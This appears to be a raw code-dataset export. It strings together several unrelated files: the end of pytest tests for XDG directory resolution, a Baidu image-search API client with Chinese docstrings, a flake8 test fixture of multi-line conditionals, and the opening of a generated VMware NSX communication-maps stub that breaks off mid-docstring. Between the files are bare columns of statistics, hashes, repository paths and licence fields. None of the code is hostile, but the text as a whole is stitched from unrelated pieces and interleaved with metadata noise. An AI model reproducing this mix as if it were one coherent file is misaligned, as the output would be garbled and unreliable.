    assert xdg.xdg_config_home() == HOME_DIR / ".config"

def test_xdg_config_home_relative(monkeypatch: MonkeyPatch) -> None:
    """A relative XDG_CONFIG_HOME is ignored in favour of the default."""
    monkeypatch.setenv("XDG_CONFIG_HOME", "rela/tive")
    monkeypatch.setenv("HOME", str(HOME_DIR))
    assert xdg.xdg_config_home() == HOME_DIR / ".config"

def test_xdg_config_home_absolute(monkeypatch: MonkeyPatch) -> None:
    """An absolute XDG_CONFIG_HOME is honoured verbatim."""
    monkeypatch.setenv("XDG_CONFIG_HOME", "/xdg_config_home")
    assert xdg.xdg_config_home() == Path("/xdg_config_home")
def test_xdg_data_dirs_unset(monkeypatch: MonkeyPatch) -> None:
    """An unset XDG_DATA_DIRS yields the two spec default directories."""
    monkeypatch.delenv("XDG_DATA_DIRS", raising=False)
    defaults = [Path("/usr/local/share/"), Path("/usr/share/")]
    assert xdg.xdg_data_dirs() == defaults

def test_xdg_data_dirs_empty(monkeypatch: MonkeyPatch) -> None:
    """An empty XDG_DATA_DIRS behaves as if it were unset."""
    monkeypatch.setenv("XDG_DATA_DIRS", "")
    defaults = [Path("/usr/local/share/"), Path("/usr/share/")]
    assert xdg.xdg_data_dirs() == defaults

def test_xdg_data_dirs_relative(monkeypatch: MonkeyPatch) -> None:
    """Relative entries in XDG_DATA_DIRS are discarded, leaving the defaults."""
    monkeypatch.setenv("XDG_DATA_DIRS", "rela/tive:ano/ther")
    defaults = [Path("/usr/local/share/"), Path("/usr/share/")]
    assert xdg.xdg_data_dirs() == defaults

def test_xdg_data_dirs_set(monkeypatch: MonkeyPatch) -> None:
    """Absolute entries are kept in order; relative ones are dropped."""
    monkeypatch.setenv("XDG_DATA_DIRS", "/first/:rela/tive:/sec/ond/")
    assert xdg.xdg_data_dirs() == [Path("/first/"), Path("/sec/ond/")]
def test_xdg_data_home_unset(monkeypatch: MonkeyPatch) -> None:
    """An unset XDG_DATA_HOME falls back to $HOME/.local/share."""
    monkeypatch.setenv("HOME", str(HOME_DIR))
    monkeypatch.delenv("XDG_DATA_HOME", raising=False)
    assert xdg.xdg_data_home() == HOME_DIR / ".local" / "share"

def test_xdg_data_home_empty(monkeypatch: MonkeyPatch) -> None:
    """An empty XDG_DATA_HOME behaves as if it were unset."""
    monkeypatch.setenv("XDG_DATA_HOME", "")
    monkeypatch.setenv("HOME", str(HOME_DIR))
    assert xdg.xdg_data_home() == HOME_DIR / ".local" / "share"

def test_xdg_data_home_relative(monkeypatch: MonkeyPatch) -> None:
    """A relative XDG_DATA_HOME is ignored in favour of the default."""
    monkeypatch.setenv("XDG_DATA_HOME", "rela/tive")
    monkeypatch.setenv("HOME", str(HOME_DIR))
    assert xdg.xdg_data_home() == HOME_DIR / ".local" / "share"

def test_xdg_data_home_absolute(monkeypatch: MonkeyPatch) -> None:
    """An absolute XDG_DATA_HOME is honoured verbatim."""
    monkeypatch.setenv("XDG_DATA_HOME", "/xdg_data_home")
    assert xdg.xdg_data_home() == Path("/xdg_data_home")
def test_xdg_runtime_dir_unset(monkeypatch: MonkeyPatch) -> None:
    """An unset XDG_RUNTIME_DIR has no default and yields None."""
    monkeypatch.delenv("XDG_RUNTIME_DIR", raising=False)
    assert xdg.xdg_runtime_dir() is None

def test_xdg_runtime_dir_empty(monkeypatch: MonkeyPatch) -> None:
    """An empty XDG_RUNTIME_DIR behaves as if it were unset."""
    monkeypatch.setenv("XDG_RUNTIME_DIR", "")
    assert xdg.xdg_runtime_dir() is None

def test_xdg_runtime_dir_relative(monkeypatch: MonkeyPatch) -> None:
    """A relative XDG_RUNTIME_DIR is rejected, yielding None."""
    monkeypatch.setenv("XDG_RUNTIME_DIR", "rela/tive")
    assert xdg.xdg_runtime_dir() is None

def test_xdg_runtime_dir_absolute(monkeypatch: MonkeyPatch) -> None:
    """An absolute XDG_RUNTIME_DIR is honoured verbatim."""
    monkeypatch.setenv("XDG_RUNTIME_DIR", "/xdg_runtime_dir")
    assert xdg.xdg_runtime_dir() == Path("/xdg_runtime_dir")
def test_xdg_state_home_unset(monkeypatch: MonkeyPatch) -> None:
    """An unset XDG_STATE_HOME falls back to $HOME/.local/state."""
    monkeypatch.setenv("HOME", str(HOME_DIR))
    monkeypatch.delenv("XDG_STATE_HOME", raising=False)
    assert xdg.xdg_state_home() == HOME_DIR / ".local" / "state"

def test_xdg_state_home_empty(monkeypatch: MonkeyPatch) -> None:
    """An empty XDG_STATE_HOME behaves as if it were unset."""
    monkeypatch.setenv("XDG_STATE_HOME", "")
    monkeypatch.setenv("HOME", str(HOME_DIR))
    assert xdg.xdg_state_home() == HOME_DIR / ".local" / "state"

def test_xdg_state_home_relative(monkeypatch: MonkeyPatch) -> None:
    """A relative XDG_STATE_HOME is ignored in favour of the default."""
    monkeypatch.setenv("XDG_STATE_HOME", "rela/tive")
    monkeypatch.setenv("HOME", str(HOME_DIR))
    assert xdg.xdg_state_home() == HOME_DIR / ".local" / "state"

def test_xdg_state_home_absolute(monkeypatch: MonkeyPatch) -> None:
    """An absolute XDG_STATE_HOME is honoured verbatim."""
    monkeypatch.setenv("XDG_STATE_HOME", "/xdg_state_home")
    assert xdg.xdg_state_home() == Path("/xdg_state_home")
| 38.92
| 70
| 0.723664
| 1,094
| 7,784
| 4.799817
| 0.042962
| 0.074652
| 0.053323
| 0.15997
| 0.960008
| 0.914492
| 0.830318
| 0.760998
| 0.719482
| 0.693582
| 0
| 0
| 0.139003
| 7,784
| 199
| 71
| 39.115578
| 0.783497
| 0.195401
| 0
| 0.354545
| 0
| 0
| 0.160209
| 0.008501
| 0
| 0
| 0
| 0
| 0.254545
| 1
| 0.254545
| false
| 0
| 0.036364
| 0
| 0.290909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50f0d0366d7ca48c096063219deb1f4c78c2f05c
| 13,578
|
py
|
Python
|
build/lib/aip/imagesearch.py
|
electricats/hakDProject
|
7633f71feb14c756e8213f7243b5a531a51fcbe6
|
[
"Apache-2.0"
] | 1
|
2021-08-17T11:19:08.000Z
|
2021-08-17T11:19:08.000Z
|
build/lib/aip/imagesearch.py
|
electricats/hakDProject
|
7633f71feb14c756e8213f7243b5a531a51fcbe6
|
[
"Apache-2.0"
] | null | null | null |
build/lib/aip/imagesearch.py
|
electricats/hakDProject
|
7633f71feb14c756e8213f7243b5a531a51fcbe6
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
图像搜索
"""
import re
import sys
import math
import time
from .base import AipBase
from .base import base64
from .base import json
from .base import urlencode
from .base import quote
class AipImageSearch(AipBase):
    """Baidu AIP image-search client.

    Wraps the realtime image-search REST endpoints — same-image (HQ),
    similar-image, product and picture-book search — each offering
    add / search / update / delete operations.
    """
    # Same-image (HQ) realtime search endpoints.
    __sameHqAddUrl = 'https://aip.baidubce.com/rest/2.0/realtime_search/same_hq/add'
    __sameHqSearchUrl = 'https://aip.baidubce.com/rest/2.0/realtime_search/same_hq/search'
    __sameHqUpdateUrl = 'https://aip.baidubce.com/rest/2.0/realtime_search/same_hq/update'
    __sameHqDeleteUrl = 'https://aip.baidubce.com/rest/2.0/realtime_search/same_hq/delete'
    # Similar-image realtime search endpoints.
    __similarAddUrl = 'https://aip.baidubce.com/rest/2.0/image-classify/v1/realtime_search/similar/add'
    __similarSearchUrl = 'https://aip.baidubce.com/rest/2.0/image-classify/v1/realtime_search/similar/search'
    __similarUpdateUrl = 'https://aip.baidubce.com/rest/2.0/image-classify/v1/realtime_search/similar/update'
    __similarDeleteUrl = 'https://aip.baidubce.com/rest/2.0/image-classify/v1/realtime_search/similar/delete'
    # Product realtime search endpoints.
    __productAddUrl = 'https://aip.baidubce.com/rest/2.0/image-classify/v1/realtime_search/product/add'
    __productSearchUrl = 'https://aip.baidubce.com/rest/2.0/image-classify/v1/realtime_search/product/search'
    __productUpdateUrl = 'https://aip.baidubce.com/rest/2.0/image-classify/v1/realtime_search/product/update'
    __productDeleteUrl = 'https://aip.baidubce.com/rest/2.0/image-classify/v1/realtime_search/product/delete'
    # Picture-book realtime search endpoints.
    __picturebookAdd = "https://aip.baidubce.com/rest/2.0/imagesearch/v1/realtime_search/picturebook/add"
    __picturebookSearch = "https://aip.baidubce.com/rest/2.0/imagesearch/v1/realtime_search/picturebook/search"
    __picturebookDelete = "https://aip.baidubce.com/rest/2.0/imagesearch/v1/realtime_search/picturebook/delete"
    __picturebookUpdate = "https://aip.baidubce.com/rest/2.0/imagesearch/v1/realtime_search/picturebook/update"
def sameHqAdd(self, image, brief, options=None):
    """Same-image (HQ) search: add a binary image and its brief to the index."""
    data = {
        'image': base64.b64encode(image).decode(),
        'brief': brief,
    }
    data.update(options or {})
    return self._request(self.__sameHqAddUrl, data)

def sameHqAddUrl(self, url, brief, options=None):
    """Same-image (HQ) search: add an image by URL and its brief to the index."""
    data = {
        'url': url,
        'brief': brief,
    }
    data.update(options or {})
    return self._request(self.__sameHqAddUrl, data)

def sameHqSearch(self, image, options=None):
    """Same-image (HQ) search: query the index with a binary image."""
    data = {'image': base64.b64encode(image).decode()}
    data.update(options or {})
    return self._request(self.__sameHqSearchUrl, data)

def sameHqSearchUrl(self, url, options=None):
    """Same-image (HQ) search: query the index with an image URL."""
    data = {'url': url}
    data.update(options or {})
    return self._request(self.__sameHqSearchUrl, data)

def sameHqUpdate(self, image, options=None):
    """Same-image (HQ) search: update an entry identified by binary image."""
    data = {'image': base64.b64encode(image).decode()}
    data.update(options or {})
    return self._request(self.__sameHqUpdateUrl, data)

def sameHqUpdateUrl(self, url, options=None):
    """Same-image (HQ) search: update an entry identified by image URL."""
    data = {'url': url}
    data.update(options or {})
    return self._request(self.__sameHqUpdateUrl, data)

def sameHqUpdateContSign(self, cont_sign, options=None):
    """Same-image (HQ) search: update an entry identified by content signature."""
    data = {'cont_sign': cont_sign}
    data.update(options or {})
    return self._request(self.__sameHqUpdateUrl, data)

def sameHqDeleteByImage(self, image, options=None):
    """Same-image (HQ) search: delete an entry identified by binary image."""
    data = {'image': base64.b64encode(image).decode()}
    data.update(options or {})
    return self._request(self.__sameHqDeleteUrl, data)

def sameHqDeleteByUrl(self, url, options=None):
    """Same-image (HQ) search: delete an entry identified by image URL."""
    data = {'url': url}
    data.update(options or {})
    return self._request(self.__sameHqDeleteUrl, data)

def sameHqDeleteBySign(self, cont_sign, options=None):
    """Same-image (HQ) search: delete an entry identified by content signature."""
    data = {'cont_sign': cont_sign}
    data.update(options or {})
    return self._request(self.__sameHqDeleteUrl, data)
def similarAdd(self, image, brief, options=None):
    """Similar-image search: add a binary image and its brief to the index."""
    data = {
        'image': base64.b64encode(image).decode(),
        'brief': brief,
    }
    data.update(options or {})
    return self._request(self.__similarAddUrl, data)

def similarAddUrl(self, url, brief, options=None):
    """Similar-image search: add an image by URL and its brief to the index."""
    data = {
        'url': url,
        'brief': brief,
    }
    data.update(options or {})
    return self._request(self.__similarAddUrl, data)

def similarSearch(self, image, options=None):
    """Similar-image search: query the index with a binary image."""
    data = {'image': base64.b64encode(image).decode()}
    data.update(options or {})
    return self._request(self.__similarSearchUrl, data)

def similarSearchUrl(self, url, options=None):
    """Similar-image search: query the index with an image URL."""
    data = {'url': url}
    data.update(options or {})
    return self._request(self.__similarSearchUrl, data)

def similarUpdate(self, image, options=None):
    """Similar-image search: update an entry identified by binary image."""
    data = {'image': base64.b64encode(image).decode()}
    data.update(options or {})
    return self._request(self.__similarUpdateUrl, data)

def similarUpdateUrl(self, url, options=None):
    """Similar-image search: update an entry identified by image URL."""
    data = {'url': url}
    data.update(options or {})
    return self._request(self.__similarUpdateUrl, data)

def similarUpdateContSign(self, cont_sign, options=None):
    """Similar-image search: update an entry identified by content signature."""
    data = {'cont_sign': cont_sign}
    data.update(options or {})
    return self._request(self.__similarUpdateUrl, data)

def similarDeleteByImage(self, image, options=None):
    """Similar-image search: delete an entry identified by binary image."""
    data = {'image': base64.b64encode(image).decode()}
    data.update(options or {})
    return self._request(self.__similarDeleteUrl, data)

def similarDeleteByUrl(self, url, options=None):
    """Similar-image search: delete an entry identified by image URL."""
    data = {'url': url}
    data.update(options or {})
    return self._request(self.__similarDeleteUrl, data)

def similarDeleteBySign(self, cont_sign, options=None):
    """Similar-image search: delete an entry identified by content signature."""
    data = {'cont_sign': cont_sign}
    data.update(options or {})
    return self._request(self.__similarDeleteUrl, data)
def productAdd(self, image, brief, options=None):
"""
商品检索—入库
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data['brief'] = brief
data.update(options)
return self._request(self.__productAddUrl, data)
def productAddUrl(self, url, brief, options=None):
"""
商品检索—入库
"""
options = options or {}
data = {}
data['url'] = url
data['brief'] = brief
data.update(options)
return self._request(self.__productAddUrl, data)
def productSearch(self, image, options=None):
"""
商品检索—检索
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data.update(options)
return self._request(self.__productSearchUrl, data)
def productSearchUrl(self, url, options=None):
"""
商品检索—检索
"""
options = options or {}
data = {}
data['url'] = url
data.update(options)
return self._request(self.__productSearchUrl, data)
def productUpdate(self, image, options=None):
"""
商品检索—更新
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data.update(options)
return self._request(self.__productUpdateUrl, data)
def productUpdateUrl(self, url, options=None):
"""
商品检索—更新
"""
options = options or {}
data = {}
data['url'] = url
data.update(options)
return self._request(self.__productUpdateUrl, data)
def productUpdateContSign(self, cont_sign, options=None):
"""
商品检索—更新
"""
options = options or {}
data = {}
data['cont_sign'] = cont_sign
data.update(options)
return self._request(self.__productUpdateUrl, data)
def productDeleteByImage(self, image, options=None):
"""
商品检索—删除
"""
options = options or {}
data = {}
data['image'] = base64.b64encode(image).decode()
data.update(options)
return self._request(self.__productDeleteUrl, data)
def productDeleteByUrl(self, url, options=None):
    """Product search - delete a library entry identified by an image URL.

    :param url: publicly reachable URL of the image
    :param options: optional extra request parameters
    """
    payload = {'url': url}
    payload.update(options or {})
    return self._request(self.__productDeleteUrl, payload)
def productDeleteBySign(self, cont_sign, options=None):
    """Product search - delete a library entry by its content signature.

    :param cont_sign: content signature identifying the stored image
    :param options: optional extra request parameters
    """
    payload = {'cont_sign': cont_sign}
    payload.update(options or {})
    return self._request(self.__productDeleteUrl, payload)
def pictureBookAddImage(self, image, brief, options=None):
    """Picture-book search - add an image to the library.

    :param image: raw image bytes; sent base64-encoded
    :param brief: brief info stored alongside the image
    :param options: optional extra request parameters
    """
    payload = {
        'image': base64.b64encode(image).decode(),
        'brief': brief,
    }
    payload.update(options or {})
    return self._request(self.__picturebookAdd, payload)
def pictureBookAddUrl(self, url, brief, options=None):
    """Picture-book search - add an image to the library by URL.

    :param url: publicly reachable URL of the image
    :param brief: brief info stored alongside the image
    :param options: optional extra request parameters
    """
    payload = {'url': url, 'brief': brief}
    payload.update(options or {})
    return self._request(self.__picturebookAdd, payload)
def pictureBookSearchImage(self, image, options=None):
    """Picture-book search - query the library with an image.

    :param image: raw image bytes; sent base64-encoded
    :param options: optional extra request parameters
    """
    payload = {'image': base64.b64encode(image).decode()}
    payload.update(options or {})
    return self._request(self.__picturebookSearch, payload)
def pictureBookSearchUrl(self, url, options=None):
    """Picture-book search - query the library with an image URL.

    :param url: publicly reachable URL of the image
    :param options: optional extra request parameters
    """
    payload = {'url': url}
    payload.update(options or {})
    return self._request(self.__picturebookSearch, payload)
def pictureBookUpdate(self, image, options=None):
    """Picture-book search - update a library entry identified by an image.

    :param image: raw image bytes; sent base64-encoded
    :param options: optional extra request parameters
    """
    payload = {'image': base64.b64encode(image).decode()}
    payload.update(options or {})
    return self._request(self.__picturebookUpdate, payload)
def pictureBookUpdateUrl(self, url, options=None):
    """Picture-book search - update a library entry identified by a URL.

    :param url: publicly reachable URL of the image
    :param options: optional extra request parameters
    """
    payload = {'url': url}
    payload.update(options or {})
    return self._request(self.__picturebookUpdate, payload)
def pictureBookUpdateContSign(self, cont_sign, options=None):
    """Picture-book search - update a library entry by content signature.

    :param cont_sign: content signature identifying the stored image
    :param options: optional extra request parameters
    """
    payload = {'cont_sign': cont_sign}
    payload.update(options or {})
    return self._request(self.__picturebookUpdate, payload)
def pictureBookDeleteByImage(self, image, options=None):
    """Picture-book search - delete a library entry identified by an image.

    :param image: raw image bytes; sent base64-encoded
    :param options: optional extra request parameters
    """
    payload = {'image': base64.b64encode(image).decode()}
    payload.update(options or {})
    return self._request(self.__picturebookDelete, payload)
def pictureBookDeleteByUrl(self, url, options=None):
    """Picture-book search - delete a library entry identified by a URL.

    :param url: publicly reachable URL of the image
    :param options: optional extra request parameters
    """
    payload = {'url': url}
    payload.update(options or {})
    return self._request(self.__picturebookDelete, payload)
def pictureBookDeleteBySign(self, cont_sign, options=None):
    """Picture-book search - delete a library entry by content signature.

    :param cont_sign: content signature identifying the stored image
    :param options: optional extra request parameters
    """
    payload = {'cont_sign': cont_sign}
    payload.update(options or {})
    return self._request(self.__picturebookDelete, payload)
| 23.90493
| 111
| 0.565032
| 1,380
| 13,578
| 5.444928
| 0.078261
| 0.058557
| 0.085174
| 0.106468
| 0.841762
| 0.831115
| 0.784536
| 0.766968
| 0.766968
| 0.763774
| 0
| 0.01182
| 0.308366
| 13,578
| 567
| 112
| 23.94709
| 0.784049
| 0.033289
| 0
| 0.759124
| 0
| 0.043796
| 0.122463
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.145985
| false
| 0
| 0.032847
| 0
| 0.386861
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0f9ec6b8f5ad6372a75ecb059b4e64ff8d44643d
| 382
|
py
|
Python
|
tests/dummy/conditional_block.py
|
thewchan/flake8-multiline-containers
|
921f48eec5ad4b6b12c150d2c0c1d6fd412539b8
|
[
"MIT"
] | 10
|
2019-06-03T22:48:13.000Z
|
2021-06-14T09:01:42.000Z
|
tests/dummy/conditional_block.py
|
thewchan/flake8-multiline-containers
|
921f48eec5ad4b6b12c150d2c0c1d6fd412539b8
|
[
"MIT"
] | 22
|
2019-07-10T18:49:58.000Z
|
2022-03-18T12:58:32.000Z
|
tests/dummy/conditional_block.py
|
thewchan/flake8-multiline-containers
|
921f48eec5ad4b6b12c150d2c0c1d6fd412539b8
|
[
"MIT"
] | 3
|
2019-10-12T20:01:24.000Z
|
2021-11-06T20:38:48.000Z
|
# Lint-test fixture: `if`/`elif` conditions written on one line, across
# multiple lines, and with nested parentheses. The exact layout is the
# point of the file — do not reformat.
# NOTE(review): presumably consumed by flake8-multiline-containers tests;
# confirm against that test suite before touching.
# One line
if (False or True):
    pass
elif (False or True):
    pass

# Multiple lines
if (False
        or True):
    pass
elif (False
        or True):
    pass

if (
    False or True
):
    pass
elif (
    False or True
):
    pass

# Nested
if (True or (False or True)): pass

if (
    True or (False or True)
): pass

if (
    True or (
        False
        or True)
): pass
| 8.681818
| 34
| 0.531414
| 56
| 382
| 3.625
| 0.196429
| 0.310345
| 0.487685
| 0.665025
| 0.871921
| 0.871921
| 0.871921
| 0.871921
| 0.871921
| 0.871921
| 0
| 0
| 0.374346
| 382
| 43
| 35
| 8.883721
| 0.849372
| 0.078534
| 0
| 0.62963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 11
|
0faded617019c02ac6f4d9137bce3fb4fb8af3bf
| 122,581
|
py
|
Python
|
com/vmware/nsx_policy/infra/domains_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
com/vmware/nsx_policy/infra/domains_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
com/vmware/nsx_policy/infra/domains_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2020 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.nsx_policy.infra.domains.
#---------------------------------------------------------------------------
"""
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class CommunicationMaps(VapiInterface):
    """
    vAPI stub for the
    ``com.vmware.nsx_policy.infra.domains.communication_maps`` service.
    Every operation on this service is deprecated in favor of the
    corresponding /infra/domains/.../security-policies API; see the
    individual method docstrings for the replacement endpoint.
    """
    # Allowed values for the ``operation`` argument of :func:`revise`.
    REVISE_OPERATION_TOP = "insert_top"
    """
    Possible value for ``operation`` of method :func:`CommunicationMaps.revise`.

    """
    REVISE_OPERATION_BOTTOM = "insert_bottom"
    """
    Possible value for ``operation`` of method :func:`CommunicationMaps.revise`.

    """
    REVISE_OPERATION_AFTER = "insert_after"
    """
    Possible value for ``operation`` of method :func:`CommunicationMaps.revise`.

    """
    REVISE_OPERATION_BEFORE = "insert_before"
    """
    Possible value for ``operation`` of method :func:`CommunicationMaps.revise`.

    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx_policy.infra.domains.communication_maps'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _CommunicationMapsStub)
        self._VAPI_OPERATION_IDS = {}

    def delete(self,
               domain_id,
               communication_map_id,
               ):
        """
        Deletes the communication map along with all the communication entries
        This API is deprecated. Please use the following API instead. DELETE
        /infra/domains/domain-id/security-policies/security-policy-id

        :type  domain_id: :class:`str`
        :param domain_id: (required)
        :type  communication_map_id: :class:`str`
        :param communication_map_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('delete',
                            {
                            'domain_id': domain_id,
                            'communication_map_id': communication_map_id,
                            })

    def get(self,
            domain_id,
            communication_map_id,
            ):
        """
        Read communication-map for a domain. This API is deprecated. Please use
        the following API instead. GET
        /infra/domains/domain-id/security-policies/security-policy-id

        :type  domain_id: :class:`str`
        :param domain_id: (required)
        :type  communication_map_id: :class:`str`
        :param communication_map_id: (required)
        :rtype: :class:`com.vmware.nsx_policy.model_client.CommunicationMap`
        :return: com.vmware.nsx_policy.model.CommunicationMap
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('get',
                            {
                            'domain_id': domain_id,
                            'communication_map_id': communication_map_id,
                            })

    def list(self,
             domain_id,
             cursor=None,
             include_mark_for_delete_objects=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             ):
        """
        List all communication maps for a domain. This API is deprecated.
        Please use the following API instead. GET
        /infra/domains/domain-id/security-policies

        :type  domain_id: :class:`str`
        :param domain_id: (required)
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of records (supplied
            by current result page) (optional)
        :type  include_mark_for_delete_objects: :class:`bool` or ``None``
        :param include_mark_for_delete_objects: Include objects that are marked for deletion in results (optional,
            default to false)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be included in query
            result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page (server may return
            fewer) (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx_policy.model_client.CommunicationMapListResult`
        :return: com.vmware.nsx_policy.model.CommunicationMapListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('list',
                            {
                            'domain_id': domain_id,
                            'cursor': cursor,
                            'include_mark_for_delete_objects': include_mark_for_delete_objects,
                            'included_fields': included_fields,
                            'page_size': page_size,
                            'sort_ascending': sort_ascending,
                            'sort_by': sort_by,
                            })

    def patch(self,
              domain_id,
              communication_map_id,
              communication_map,
              ):
        """
        Patch the communication map for a domain. If a communication map for
        the given communication-map-id is not present, the object will get
        created and if it is present it will be updated. This is a full replace
        This API is deprecated. Please use the following API instead. PATCH
        /infra/domains/domain-id/security-policies/security-policy-id

        :type  domain_id: :class:`str`
        :param domain_id: (required)
        :type  communication_map_id: :class:`str`
        :param communication_map_id: (required)
        :type  communication_map: :class:`com.vmware.nsx_policy.model_client.CommunicationMap`
        :param communication_map: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('patch',
                            {
                            'domain_id': domain_id,
                            'communication_map_id': communication_map_id,
                            'communication_map': communication_map,
                            })

    def revise(self,
               domain_id,
               communication_map_id,
               communication_map,
               anchor_path=None,
               operation=None,
               ):
        """
        This is used to set a precedence of a communication map w.r.t others.
        This API is deprecated. Please use the following API instead. POST
        /infra/domains/domain-id/security-policies/security-policy-id?action=revise

        :type  domain_id: :class:`str`
        :param domain_id: (required)
        :type  communication_map_id: :class:`str`
        :param communication_map_id: (required)
        :type  communication_map: :class:`com.vmware.nsx_policy.model_client.CommunicationMap`
        :param communication_map: (required)
        :type  anchor_path: :class:`str` or ``None``
        :param anchor_path: The communication map/communication entry path if operation is
            'insert_after' or 'insert_before' (optional)
        :type  operation: :class:`str` or ``None``
        :param operation: Operation (optional, default to insert_top)
        :rtype: :class:`com.vmware.nsx_policy.model_client.CommunicationMap`
        :return: com.vmware.nsx_policy.model.CommunicationMap
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('revise',
                            {
                            'domain_id': domain_id,
                            'communication_map_id': communication_map_id,
                            'communication_map': communication_map,
                            'anchor_path': anchor_path,
                            'operation': operation,
                            })

    def update(self,
               domain_id,
               communication_map_id,
               communication_map,
               ):
        """
        Create or Update the communication map for a domain. This is a full
        replace. All the CommunicationEntries are replaced. This API is
        deprecated. Please use the following API instead. PUT
        /infra/domains/domain-id/security-policies/security-policy-id

        :type  domain_id: :class:`str`
        :param domain_id: (required)
        :type  communication_map_id: :class:`str`
        :param communication_map_id: (required)
        :type  communication_map: :class:`com.vmware.nsx_policy.model_client.CommunicationMap`
        :param communication_map: (required)
        :rtype: :class:`com.vmware.nsx_policy.model_client.CommunicationMap`
        :return: com.vmware.nsx_policy.model.CommunicationMap
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
